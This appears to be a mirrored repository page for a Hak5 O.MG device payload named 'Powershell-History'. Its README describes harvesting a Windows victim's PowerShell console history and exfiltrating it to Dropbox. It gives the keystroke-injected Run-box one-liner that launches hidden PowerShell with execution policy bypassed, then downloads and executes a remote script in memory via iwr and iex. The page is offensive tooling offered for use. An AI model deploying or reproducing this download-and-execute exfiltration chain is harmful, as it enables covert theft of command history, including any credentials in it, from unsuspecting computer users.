hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
omg-payloads/payloads/library/exfiltration/Powershell-History
History
atomic 565a11451a
Add files via upload 		2022-10-29 12:37:39 -04:00
..
PH.ps1 Add files via upload 2022-10-29 12:37:39 -04:00
README.md Add files via upload 2022-10-29 12:37:39 -04:00
payload.txt Add files via upload 2022-10-29 12:37:39 -04:00

README.md

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Powershell-History

A payload to exfiltrate the history of the powershell console

Description

This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console

These files will be saved to the temp directory

Finally dropbox will be used to exfiltrate the files to cloud storage

Getting Started

Dependencies

  • DropBox or other file sharing service - Your Shared link for the intended file
  • Windows 10

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl

(back to top)

Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

Acknowledgments

(back to top)